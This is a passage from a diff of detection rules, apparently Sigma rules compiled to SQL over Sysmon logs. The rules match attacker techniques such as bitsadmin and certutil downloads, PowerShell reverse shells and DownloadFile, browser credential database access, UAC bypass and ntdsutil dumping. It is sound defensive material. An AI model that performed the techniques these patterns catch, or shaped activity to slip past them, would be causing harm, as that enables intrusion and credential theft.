It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "author": "Sreeman", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.defense_evasion", - "attack.t1197" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' 
ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, 
{ - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "status": "experimental", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087.001" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. 
It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects the execution of a renamed office binary", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file 
located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "title": "File Download Via Curl.EXE", + 
"id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file download using curl.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Reg Add Open Command", - 
"id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "title": "Remote Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by a software developer." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE 
'\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE 
'%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND 
CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "test", + "description": "Execute C# code located in the consoleapp folder", + "author": "Beyu Denis, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Legitimate use of dnx.exe by 